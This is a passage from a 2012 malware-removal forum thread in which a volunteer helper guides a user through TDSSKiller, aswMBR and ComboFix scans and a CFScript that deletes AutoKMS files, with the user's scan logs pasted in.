16:50:35.0488 5136 storvsc (d34e4943d5ac096c8edeebfd80d76e23) C:\Windows\system32\drivers\storvsc.sys
16:50:35.0488 5136 storvsc - ok
16:50:35.0520 5136 swenum (d01ec09b6711a5f8e7e6564a4d0fbc90) C:\Windows\system32\drivers\swenum.sys
16:50:35.0520 5136 swenum - ok
16:50:35.0629 5136 SwitchBoard (f577910a133a592234ebaad3f3afa258) C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
16:50:35.0629 5136 SwitchBoard - ok
16:50:35.0722 5136 swprv (e08e46fdd841b7184194011ca1955a0b) C:\Windows\System32\swprv.dll
16:50:35.0722 5136 swprv - ok
16:50:35.0785 5136 Synth3dVsc - ok
16:50:35.0847 5136 SysMain (bf9ccc0bf39b418c8d0ae8b05cf95b7d) C:\Windows\system32\sysmain.dll
16:50:35.0878 5136 SysMain - ok
16:50:35.0910 5136 TabletInputService (e3c61fd7b7c2557e1f1b0b4cec713585) C:\Windows\System32\TabSvc.dll
16:50:35.0910 5136 TabletInputService - ok
16:50:35.0972 5136 TapiSrv (40f0849f65d13ee87b9a9ae3c1dd6823) C:\Windows\System32\tapisrv.dll
16:50:35.0972 5136 TapiSrv - ok
16:50:36.0019 5136 TBS (1be03ac720f4d302ea01d40f588162f6) C:\Windows\System32\tbssvc.dll
16:50:36.0019 5136 TBS - ok
16:50:36.0081 5136 Tcpip (fc62769e7bff2896035aeed399108162) C:\Windows\system32\drivers\tcpip.sys
16:50:36.0112 5136 Tcpip - ok
16:50:36.0159 5136 TCPIP6 (fc62769e7bff2896035aeed399108162) C:\Windows\system32\DRIVERS\tcpip.sys
16:50:36.0175 5136 TCPIP6 - ok
16:50:36.0206 5136 tcpipreg (df687e3d8836bfb04fcc0615bf15a519) C:\Windows\system32\drivers\tcpipreg.sys
16:50:36.0206 5136 tcpipreg - ok
16:50:36.0237 5136 TDPIPE (3371d21011695b16333a3934340c4e7c) C:\Windows\system32\drivers\tdpipe.sys
16:50:36.0237 5136 TDPIPE - ok
16:50:36.0284 5136 TDTCP (51c5eceb1cdee2468a1748be550cfbc8) C:\Windows\system32\drivers\tdtcp.sys
16:50:36.0284 5136 TDTCP - ok
16:50:36.0315 5136 tdx (ddad5a7ab24d8b65f8d724f5c20fd806) C:\Windows\system32\DRIVERS\tdx.sys
16:50:36.0315 5136 tdx - ok
16:50:36.0362 5136 TermDD (561e7e1f06895d78de991e01dd0fb6e5) C:\Windows\system32\drivers\termdd.sys
16:50:36.0362 5136 TermDD - ok
16:50:36.0409 5136 TermService (2e648163254233755035b46dd7b89123) C:\Windows\System32\termsrv.dll
16:50:36.0424 5136 TermService - ok
16:50:36.0471 5136 Themes (f0344071948d1a1fa732231785a0664c) C:\Windows\system32\themeservice.dll
16:50:36.0471 5136 Themes - ok
16:50:36.0502 5136 THREADORDER (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
16:50:36.0502 5136 THREADORDER - ok
16:50:36.0534 5136 TrkWks (7e7afd841694f6ac397e99d75cead49d) C:\Windows\System32\trkwks.dll
16:50:36.0534 5136 TrkWks - ok
16:50:36.0565 5136 TrustedInstaller (773212b2aaa24c1e31f10246b15b276c) C:\Windows\servicing\TrustedInstaller.exe
16:50:36.0565 5136 TrustedInstaller - ok
16:50:36.0612 5136 tssecsrv (ce18b2cdfc837c99e5fae9ca6cba5d30) C:\Windows\system32\DRIVERS\tssecsrv.sys
16:50:36.0612 5136 tssecsrv - ok
16:50:36.0643 5136 TsUsbFlt (d11c783e3ef9a3c52c0ebe83cc5000e9) C:\Windows\system32\drivers\tsusbflt.sys
16:50:36.0643 5136 TsUsbFlt - ok
16:50:36.0658 5136 tsusbhub - ok
16:50:36.0799 5136 TuneUp.UtilitiesSvc (8d4cc6a5c51acb30f801f78f694c7ea5) C:\Program Files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe
16:50:36.0814 5136 TuneUp.UtilitiesSvc - ok
16:50:36.0861 5136 TuneUpUtilitiesDrv (dcc94c51d27c7ec0dadeca8f64c94fcf) C:\Program Files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys
16:50:36.0861 5136 TuneUpUtilitiesDrv - ok
16:50:36.0970 5136 tunnel (3566a8daafa27af944f5d705eaa64894) C:\Windows\system32\DRIVERS\tunnel.sys
16:50:36.0970 5136 tunnel - ok
16:50:37.0002 5136 uagp35 (b4dd609bd7e282bfc683cec7eaaaad67) C:\Windows\system32\DRIVERS\uagp35.sys
16:50:37.0017 5136 uagp35 - ok
16:50:37.0033 5136 udfs (ff4232a1a64012baa1fd97c7b67df593) C:\Windows\system32\DRIVERS\udfs.sys
16:50:37.0048 5136 udfs - ok
16:50:37.0080 5136 UI0Detect (3cbdec8d06b9968aba702eba076364a1) C:\Windows\system32\UI0Detect.exe
16:50:37.0080 5136 UI0Detect - ok
16:50:37.0111 5136 uliagpkx (4bfe1bc28391222894cbf1e7d0e42320) C:\Windows\system32\drivers\uliagpkx.sys
16:50:37.0111 5136 uliagpkx - ok
16:50:37.0158 5136 umbus (dc54a574663a895c8763af0fa1ff7561) C:\Windows\system32\DRIVERS\umbus.sys
16:50:37.0158 5136 umbus - ok
16:50:37.0173 5136 UmPass (b2e8e8cb557b156da5493bbddcc1474d) C:\Windows\system32\DRIVERS\umpass.sys
16:50:37.0173 5136 UmPass - ok
16:50:37.0220 5136 UmRdpService (a293dcd756d04d8492a750d03b9a297c) C:\Windows\System32\umrdp.dll
16:50:37.0220 5136 UmRdpService - ok
16:50:37.0282 5136 upnphost (d47ec6a8e81633dd18d2436b19baf6de) C:\Windows\System32\upnphost.dll
16:50:37.0282 5136 upnphost - ok
16:50:37.0329 5136 usbccgp (6f1a3157a1c89435352ceb543cdb359c) C:\Windows\system32\DRIVERS\usbccgp.sys
16:50:37.0329 5136 usbccgp - ok
16:50:37.0376 5136 usbcir (af0892a803fdda7492f595368e3b68e7) C:\Windows\system32\drivers\usbcir.sys
16:50:37.0376 5136 usbcir - ok
16:50:37.0392 5136 usbehci (c025055fe7b87701eb042095df1a2d7b) C:\Windows\system32\DRIVERS\usbehci.sys
16:50:37.0392 5136 usbehci - ok
16:50:37.0407 5136 usbhub (287c6c9410b111b68b52ca298f7b8c24) C:\Windows\system32\DRIVERS\usbhub.sys
16:50:37.0423 5136 usbhub - ok
16:50:37.0454 5136 usbohci (9840fc418b4cbd632d3d0a667a725c31) C:\Windows\system32\drivers\usbohci.sys
16:50:37.0454 5136 usbohci - ok
16:50:37.0485 5136 usbprint (73188f58fb384e75c4063d29413cee3d) C:\Windows\system32\DRIVERS\usbprint.sys
16:50:37.0485 5136 usbprint - ok
16:50:37.0516 5136 USBSTOR (fed648b01349a3c8395a5169db5fb7d6) C:\Windows\system32\DRIVERS\USBSTOR.SYS
16:50:37.0516 5136 USBSTOR - ok
16:50:37.0532 5136 usbuhci (62069a34518bcf9c1fd9e74b3f6db7cd) C:\Windows\system32\DRIVERS\usbuhci.sys
16:50:37.0532 5136 usbuhci - ok
16:50:37.0579 5136 usbvideo (454800c2bc7f3927ce030141ee4f4c50) C:\Windows\System32\Drivers\usbvideo.sys
16:50:37.0579 5136 usbvideo - ok
16:50:37.0641 5136 usb_rndisx (70d05ee263568a742d14e1876df80532) C:\Windows\system32\DRIVERS\usb8023x.sys
16:50:37.0641 5136 usb_rndisx - ok
16:50:37.0672 5136 UxSms (edbb23cbcf2cdf727d64ff9b51a6070e) C:\Windows\System32\uxsms.dll
16:50:37.0672 5136 UxSms - ok
16:50:37.0735 5136 UxTuneUp (31b569584d79c8d36e64dd467090f90f) C:\Windows\System32\uxtuneup.dll
16:50:37.0735 5136 UxTuneUp - ok
16:50:37.0782 5136 VaultSvc (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:37.0782 5136 VaultSvc - ok
16:50:37.0797 5136 vdrvroot (c5c876ccfc083ff3b128f933823e87bd) C:\Windows\system32\drivers\vdrvroot.sys
16:50:37.0797 5136 vdrvroot - ok
16:50:37.0844 5136 vds (8d6b481601d01a456e75c3210f1830be) C:\Windows\System32\vds.exe
16:50:37.0860 5136 vds - ok
16:50:37.0891 5136 vga (da4da3f5e02943c2dc8c6ed875de68dd) C:\Windows\system32\DRIVERS\vgapnp.sys
16:50:37.0891 5136 vga - ok
16:50:37.0953 5136 VgaSave (53e92a310193cb3c03bea963de7d9cfc) C:\Windows\System32\drivers\vga.sys
16:50:37.0953 5136 VgaSave - ok
16:50:38.0000 5136 VGPU - ok
16:50:38.0031 5136 vhdmp (2ce2df28c83aeaf30084e1b1eb253cbb) C:\Windows\system32\drivers\vhdmp.sys
16:50:38.0047 5136 vhdmp - ok
16:50:38.0078 5136 viaide (e5689d93ffe4e5d66c0178761240dd54) C:\Windows\system32\drivers\viaide.sys
16:50:38.0078 5136 viaide - ok
16:50:38.0078 5136 vmbus (86ea3e79ae350fea5331a1303054005f) C:\Windows\system32\drivers\vmbus.sys
16:50:38.0094 5136 vmbus - ok
16:50:38.0109 5136 VMBusHID (7de90b48f210d29649380545db45a187) C:\Windows\system32\drivers\VMBusHID.sys
16:50:38.0109 5136 VMBusHID - ok
16:50:38.0125 5136 volmgr (d2aafd421940f640b407aefaaebd91b0) C:\Windows\system32\drivers\volmgr.sys
16:50:38.0125 5136 volmgr - ok
16:50:38.0172 5136 volmgrx (a255814907c89be58b79ef2f189b843b) C:\Windows\system32\drivers\volmgrx.sys
16:50:38.0172 5136 volmgrx - ok
16:50:38.0187 5136 volsnap (0d08d2f3b3ff84e433346669b5e0f639) C:\Windows\system32\drivers\volsnap.sys
16:50:38.0203 5136 volsnap - ok
16:50:38.0234 5136 vsmraid (5e2016ea6ebaca03c04feac5f330d997) C:\Windows\system32\DRIVERS\vsmraid.sys
16:50:38.0234 5136 vsmraid - ok
16:50:38.0281 5136 VSS (b60ba0bc31b0cb414593e169f6f21cc2) C:\Windows\system32\vssvc.exe
16:50:38.0312 5136 VSS - ok
16:50:38.0406 5136 vwifibus (36d4720b72b5c5d9cb2b9c29e9df67a1) C:\Windows\system32\DRIVERS\vwifibus.sys
16:50:38.0406 5136 vwifibus - ok
16:50:38.0452 5136 vwififlt (6a3d66263414ff0d6fa754c646612f3f) C:\Windows\system32\DRIVERS\vwififlt.sys
16:50:38.0452 5136 vwififlt - ok
16:50:38.0499 5136 W32Time (1c9d80cc3849b3788048078c26486e1a) C:\Windows\system32\w32time.dll
16:50:38.0499 5136 W32Time - ok
16:50:38.0530 5136 WacomPen (4e9440f4f152a7b944cb1663d3935a3e) C:\Windows\system32\DRIVERS\wacompen.sys
16:50:38.0530 5136 WacomPen - ok
16:50:38.0562 5136 WANARP (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
16:50:38.0562 5136 WANARP - ok
16:50:38.0562 5136 Wanarpv6 (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
16:50:38.0562 5136 Wanarpv6 - ok
16:50:38.0624 5136 WatAdminSvc (3cec96de223e49eaae3651fcf8faea6c) C:\Windows\system32\Wat\WatAdminSvc.exe
16:50:38.0655 5136 WatAdminSvc - ok
16:50:38.0764 5136 wbengine (78f4e7f5c56cb9716238eb57da4b6a75) C:\Windows\system32\wbengine.exe
16:50:38.0780 5136 wbengine - ok
16:50:38.0811 5136 WbioSrvc (3aa101e8edab2db4131333f4325c76a3) C:\Windows\System32\wbiosrvc.dll
16:50:38.0811 5136 WbioSrvc - ok
16:50:38.0842 5136 wcncsvc (7368a2afd46e5a4481d1de9d14848edd) C:\Windows\System32\wcncsvc.dll
16:50:38.0858 5136 wcncsvc - ok
16:50:38.0858 5136 WcsPlugInService (20f7441334b18cee52027661df4a6129) C:\Windows\System32\WcsPlugInService.dll
16:50:38.0858 5136 WcsPlugInService - ok
16:50:38.0889 5136 Wd (72889e16ff12ba0f235467d6091b17dc) C:\Windows\system32\DRIVERS\wd.sys
16:50:38.0889 5136 Wd - ok
16:50:38.0920 5136 WDC_SAM (a3d04ebf5227886029b4532f20d026f7) C:\Windows\system32\DRIVERS\wdcsam64.sys
16:50:38.0936 5136 WDC_SAM - ok
16:50:38.0983 5136 Wdf01000 (441bd2d7b4f98134c3a4f9fa570fd250) C:\Windows\system32\drivers\Wdf01000.sys
16:50:38.0983 5136 Wdf01000 - ok
16:50:39.0014 5136 WdiServiceHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
16:50:39.0030 5136 WdiServiceHost - ok
16:50:39.0030 5136 WdiSystemHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
16:50:39.0030 5136 WdiSystemHost - ok
16:50:39.0045 5136 WebClient (3db6d04e1c64272f8b14eb8bc4616280) C:\Windows\System32\webclnt.dll
16:50:39.0061 5136 WebClient - ok
16:50:39.0061 5136 Wecsvc (c749025a679c5103e575e3b48e092c43) C:\Windows\system32\wecsvc.dll
16:50:39.0076 5136 Wecsvc - ok
16:50:39.0092 5136 wercplsupport (7e591867422dc788b9e5bd337a669a08) C:\Windows\System32\wercplsupport.dll
16:50:39.0092 5136 wercplsupport - ok
16:50:39.0123 5136 WerSvc (6d137963730144698cbd10f202e9f251) C:\Windows\System32\WerSvc.dll
16:50:39.0123 5136 WerSvc - ok
16:50:39.0154 5136 WfpLwf (611b23304bf067451a9fdee01fbdd725) C:\Windows\system32\DRIVERS\wfplwf.sys
16:50:39.0154 5136 WfpLwf - ok
16:50:39.0170 5136 WIMMount (05ecaec3e4529a7153b3136ceb49f0ec) C:\Windows\system32\drivers\wimmount.sys
16:50:39.0170 5136 WIMMount - ok
16:50:39.0232 5136 WinDefend - ok
16:50:39.0248 5136 WinHttpAutoProxySvc - ok
16:50:39.0295 5136 Winmgmt (19b07e7e8915d701225da41cb3877306) C:\Windows\system32\wbem\WMIsvc.dll
16:50:39.0295 5136 Winmgmt - ok
16:50:39.0357 5136 WinRM (bcb1310604aa415c4508708975b3931e) C:\Windows\system32\WsmSvc.dll
16:50:39.0388 5136 WinRM - ok
16:50:39.0498 5136 WinUsb (fe88b288356e7b47b74b13372add906d) C:\Windows\system32\DRIVERS\WinUsb.sys
16:50:39.0498 5136 WinUsb - ok
16:50:39.0544 5136 Wlansvc (4fada86e62f18a1b2f42ba18ae24e6aa) C:\Windows\System32\wlansvc.dll
16:50:39.0560 5136 Wlansvc - ok
16:50:39.0654 5136 wlidsvc (2bacd71123f42cea603f4e205e1ae337) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:50:39.0669 5136 wlidsvc - ok
16:50:39.0763 5136 WmiAcpi (f6ff8944478594d0e414d3f048f0d778) C:\Windows\system32\drivers\wmiacpi.sys
16:50:39.0763 5136 WmiAcpi - ok
16:50:39.0810 5136 wmiApSrv (38b84c94c5a8af291adfea478ae54f93) C:\Windows\system32\wbem\WmiApSrv.exe
16:50:39.0810 5136 wmiApSrv - ok
16:50:39.0888 5136 WMPNetworkSvc - ok
16:50:39.0919 5136 WPCSvc (96c6e7100d724c69fcf9e7bf590d1dca) C:\Windows\System32\wpcsvc.dll
16:50:39.0919 5136 WPCSvc - ok
16:50:39.0950 5136 WPDBusEnum (93221146d4ebbf314c29b23cd6cc391d) C:\Windows\system32\wpdbusenum.dll
16:50:39.0950 5136 WPDBusEnum - ok
16:50:39.0981 5136 ws2ifsl (6bcc1d7d2fd2453957c5479a32364e52) C:\Windows\system32\drivers\ws2ifsl.sys
16:50:39.0981 5136 ws2ifsl - ok
16:50:39.0997 5136 wscsvc (e8b1fe6669397d1772d8196df0e57a9e) C:\Windows\system32\wscsvc.dll
16:50:40.0012 5136 wscsvc - ok
16:50:40.0012 5136 WSearch - ok
16:50:40.0090 5136 wuauserv (9df12edbc698b0bc353b3ef84861e430) C:\Windows\system32\wuaueng.dll
16:50:40.0122 5136 wuauserv - ok
16:50:40.0215 5136 WudfPf (d3381dc54c34d79b22cee0d65ba91b7c) C:\Windows\system32\drivers\WudfPf.sys
16:50:40.0215 5136 WudfPf - ok
16:50:40.0262 5136 WUDFRd (cf8d590be3373029d57af80914190682) C:\Windows\system32\DRIVERS\WUDFRd.sys
16:50:40.0262 5136 WUDFRd - ok
16:50:40.0278 5136 wudfsvc (7a95c95b6c4cf292d689106bcae49543) C:\Windows\System32\WUDFSvc.dll
16:50:40.0278 5136 wudfsvc - ok
16:50:40.0309 5136 WwanSvc (9a3452b3c2a46c073166c5cf49fad1ae) C:\Windows\System32\wwansvc.dll
16:50:40.0324 5136 WwanSvc - ok
16:50:40.0356 5136 MBR (0x1B8) (a36c5e4f47e84449ff07ed3517b43a31) \Device\Harddisk0\DR0
16:50:40.0418 5136 \Device\Harddisk0\DR0 - ok
16:50:40.0418 5136 Boot (0x1200) (13ba98a2e471d5899beaa683cb9916ea) \Device\Harddisk0\DR0\Partition0
16:50:40.0418 5136 \Device\Harddisk0\DR0\Partition0 - ok
16:50:40.0434 5136 Boot (0x1200) (c56b5c47191a459af110c191da69601d) \Device\Harddisk0\DR0\Partition1
16:50:40.0434 5136 \Device\Harddisk0\DR0\Partition1 - ok
16:50:40.0434 5136 ============================================================
16:50:40.0434 5136 Scan finished
16:50:40.0434 5136 ============================================================
16:50:40.0449 1484 Detected object count: 0
16:50:40.0449 1484 Actual detected object count: 0
16:51:54.0750 4212 Deinitialize success

aswMBR:

aswMBR version 0.9.9.1665 Copyright© 2011 AVAST Software
Run date: 2012-04-17 16:52:23
-----------------------------
16:52:23.083 OS Version: Windows x64 6.1.7601 Service Pack 1
16:52:23.083 Number of processors: 2 586 0x170A
16:52:23.083 ComputerName: VINCENT-PC UserName: Vincent
16:52:24.565 Initialize success
16:53:55.406 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0
16:53:55.406 Disk 0 Vendor: Hitachi_HTS723232L9A360 FC4OC60D Size: 305245MB BusType: 11
16:53:55.421 Disk 0 MBR read successfully
16:53:55.421 Disk 0 MBR scan
16:53:55.437 Disk 0 Windows 7 default MBR code
16:53:55.437 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 199 MB offset 2048
16:53:55.453 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 305043 MB offset 409600
16:53:55.468 Disk 0 scanning C:\Windows\system32\drivers
16:54:01.275 Service scanning
16:54:14.379 Modules scanning
16:54:14.379 Disk 0 trace - called modules:
16:54:14.394 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys ataport.SYS PCIIDEX.SYS hal.dll msahci.sys
16:54:14.410 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004c66060]
16:54:14.410 3 CLASSPNP.SYS[fffff8800198f43f] -> nt!IofCallDriver -> [0xfffffa8004ae5520]
16:54:14.925 5 ACPI.sys[fffff88000f5f7a1] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-0[0xfffffa8004ae1680]
16:54:14.925 Scan finished successfully
16:54:51.616 Disk 0 MBR has been saved successfully to "C:\Users\Vincent\Documents\BPC\MBR.dat"
16:54:51.632 The log file has been saved successfully to "C:\Users\Vincent\Documents\BPC\aswMBR.txt"

Vincent

#6 gringo_pr (Bleepin Gringo, Malware Response Team)

Posted 17 April 2012 - 06:27 PM

Greetings

At this time I would like you to run this script for me, and it is a good time to check out the computer to see if there is anything else that needs to be addressed.

:Run CFScript:

Open Notepad and copy/paste the text in the box into the window:

ClearJavaCache::
KillAll::
File::
c:\windows\Tasks\AutoKMS.job
c:\windows\AutoKMS.exe

Save it to your desktop as CFScript.txt

Referring to the picture above, drag CFScript.txt into ComboFix.exe
[image: CFScript.txt being dragged onto ComboFix.exe]
This will let ComboFix run again.
Restart if you have to.
Save the produced logfile to your desktop.

Note: Do not mouse-click ComboFix's window whilst it's running. That may cause it to stall.

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion.", please restart the computer.

"information and logs"

  • In your next post I need the following

  • report from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now after running the script?

Gringo

I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University

#7 vinnie946 (Topic Starter)

Posted 17 April 2012 - 07:46 PM

Hi

There seem to be more pop-ups coming up now; 2 or 3 come up at the same time.
Also, the computer seems to minimise full-screen programs to show the desktop from time to time. I tried to play a game the other day and noticed the computer has gotten slower (lower fps than normal).

I had to run the script twice, because I forgot to save the log the first time and restarted the PC... hopefully that won't change anything?
The pop-ups are still here after running the script.

Log:

ComboFix 12-04-16.02 - Vincent 18/04/2012 1:02.3.2 - x64
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.44.1033.18.4063.2499 [GMT 1:00]
Running from: c:\users\Vincent\Documents\BPC\ComboFix.exe
Command switches used :: c:\users\Vincent\Documents\BPC\CFScript.txt
AV: ESET Smart Security 5.0 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
FW: ESET Personal firewall *Enabled* {4FE52EC8-CB26-1113-0EFE-8842E2773BAA}
SP: ESET Smart Security 5.0 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Resident AV is active
.
.
FILE ::
"c:\windows\AutoKMS.exe"
"c:\windows\Tasks\AutoKMS.job"
.
.
((((((((((((((((((((((((( Files Created from 2012-03-18 to 2012-04-18 )))))))))))))))))))))))))))))))
.
.
2012-04-18 00:10 . 2012-04-18 00:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-04-17 19:26 . 2012-03-14 03:27 8669240 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{926034D1-776D-48FC-812B-9F774FDCFB4C}\mpengine.dll
2012-04-14 15:01 . 2012-04-14 15:01 -------- d-----r- C:\Sandbox
2012-04-14 15:00 . 2012-04-14 15:00 -------- d-----w- c:\program files\Sandboxie
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\SoftRecovery
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\UserProfile
2012-04-14 11:39 . 2012-04-17 23:54 -------- d-----w- c:\users\Vincent\.gstreamer-0.10
2012-04-14 11:18 . 2012-04-14 11:47 -------- d-----w- c:\program files (x86)\Spybot - Search & Destroy
2012-04-14 11:18 . 2012-04-14 11:44 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2012-04-14 02:57 . 2012-04-14 02:57 -------- d-----w- c:\users\Vincent\AppData\Roaming\RightsNetwork
2012-04-14 02:56 . 2012-04-14 02:58 -------- d-----w- c:\program files (x86)\RightsNetwork
2012-04-13 16:28 . 2012-04-13 16:28 -------- d--h--w- c:\programdata\Common Files
2012-04-13 13:53 . 2012-04-13 13:53 -------- d-----w- c:\program files\Windows Live
2012-04-13 00:04 . 2012-04-05 11:08 25920 ----a-w- c:\windows\system32\authuitu.dll
2012-04-13 00:04 . 2012-04-05 11:08 21312 ----a-w- c:\windows\SysWow64\authuitu.dll
2012-04-12 04:17 . 2012-03-01 06:46 23408 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-04-12 04:17 . 2012-03-01 06:33 81408 ----a-w- c:\windows\system32\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 05:33 159232 ----a-w- c:\windows\SysWow64\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 06:38 220672 ----a-w- c:\windows\system32\wintrust.dll
2012-04-12 04:17 . 2012-03-01 06:28 5120 ----a-w- c:\windows\system32\wmi.dll
2012-04-12 04:17 . 2012-03-01 05:37 172544 ----a-w- c:\windows\SysWow64\wintrust.dll
2012-04-12 04:17 . 2012-03-01 05:29 5120 ----a-w- c:\windows\SysWow64\wmi.dll
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\program files (x86)\SystemRequirementsLab
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\users\Vincent\AppData\Roaming\SystemRequirementsLab
2012-04-09 01:51 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr
2012-04-09 01:51 . 2012-04-09 01:51 -------- d-----w- c:\users\Vincent\AppData\Local\PunkBuster
2012-04-09 01:27 . 2012-04-09 01:27 -------- d-----w- C:\Perfect World Entertainment
2012-04-09 01:26 . 2012-04-09 01:26 -------- d-----w- c:\windows\3F5C371F8EA24F259D3DD0B4526E3AEA.TMP
2012-04-09 01:25 . 2012-04-09 01:25 -------- d-----w- c:\program files (x86)\Common Files\Wise Installation Wizard
2012-04-09 01:25 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.exe
2012-04-09 01:25 . 2012-04-09 01:51 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0
2012-04-09 01:25 . 2012-04-09 01:52 76888 ----a-w- c:\windows\SysWow64\PnkBstrA.exe
2012-04-09 01:25 . 2011-12-19 14:16 3130440 ----a-w- c:\windows\SysWow64\pbsvc_blr.exe
2012-04-08 17:10 . 2012-04-08 17:10 -------- d-----w- c:\users\Vincent\AppData\Local\Skyrim
2012-04-08 16:59 . 2012-04-08 17:09 -------- d-----w- c:\program files (x86)\The Elder Scrolls V Skyrim
2012-04-08 15:44 . 2012-04-13 23:44 8741536 ----a-w- c:\windows\SysWow64\FlashPlayerInstaller.exe
2012-04-08 15:03 . 2012-04-13 23:44 418464 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files (x86)\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\programdata\Apple
2012-04-08 01:09 . 2012-04-08 01:16 -------- d-----w- c:\programdata\webcamXP 5
2012-04-08 00:55 . 2012-04-08 15:01 -------- d-----w- c:\program files (x86)\ManyCam
2012-04-08 00:54 . 2012-04-08 00:54 -------- d-----w- c:\programdata\Ask
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\users\Vincent\AppData\Roaming\Malwarebytes
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\programdata\Malwarebytes
2012-04-07 23:03 . 2012-04-11 11:04 -------- d-----w- c:\program files (x86)\Malwarebytes' Anti-Malware
2012-04-07 23:03 . 2012-04-04 14:56 24904 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-07 22:50 . 2012-04-07 22:50 -------- d-----w- c:\users\UpdatusUser
2012-04-06 22:25 . 2012-04-06 22:25 -------- d-----w- c:\users\Vincent\AppData\Roaming\StreamTorrent
2012-04-06 22:05 . 2012-04-06 22:05 -------- d-----w- c:\users\Vincent\AppData\Local\Facebook
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\users\Vincent\AppData\Local\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Common Files\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- C:\Binaries
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Media Link
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Mobility
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files\Motorola Inc
2012-04-05 21:44 . 2012-04-17 23:59 -------- d-----w- c:\users\Vincent\AppData\Roaming\MotoCast
2012-04-05 16:21 . 2012-04-17 23:00 -------- d-----w- c:\users\Vincent\AppData\Local\Pokki
2012-04-04 12:20 . 2012-04-04 12:20 -------- d-----w- c:\users\Vincent\AppData\Roaming\AVS4YOU
2012-04-04 02:16 . 2012-04-04 02:44 -------- d-----w- C:\Fraps
2012-03-31 14:30 . 2012-03-31 14:36 -------- d-----w- c:\program files (x86)\Amnesia - The Dark Descent
2012-03-30 21:08 . 2012-03-30 21:08 -------- d-----w- C:\NEXON
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-04-13 23:44 . 2011-12-30 22:06 70304 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2012-04-05 11:08 . 2012-03-06 21:22 34624 ----a-w- c:\windows\system32\TURegOpt.exe
2012-04-05 11:08 . 2012-03-06 21:25 35648 ----a-w- c:\windows\system32\uxtuneup.dll
2012-04-05 11:08 . 2012-03-06 21:25 28992 ----a-w- c:\windows\SysWow64\uxtuneup.dll
2012-03-08 17:50 . 2012-03-08 17:50 49016 ----a-w- c:\windows\SysWow64\sirenacm.dll
2012-03-06 12:01 . 2012-03-06 12:01 2366920 ----a-w- c:\windows\SysWow64\ijl20.dll
2012-03-01 00:02 . 2011-12-30 21:54 9717568 ----a-w- c:\windows\system32\nvwgf2umx.dll
2012-03-01 00:02 . 2011-12-30 21:54 7713088 ----a-w- c:\windows\SysWow64\nvwgf2um.dll
2012-03-01 00:02 . 2011-12-30 21:54 2660160 ----a-w- c:\windows\system32\nvapi64.dll
2012-03-01 00:02 . 2011-12-30 21:54 2301248 ----a-w- c:\windows\SysWow64\nvapi.dll
2012-03-01 00:02 . 2011-12-30 21:54 1737536 ----a-w- c:\windows\system32\nvdispco64.dll
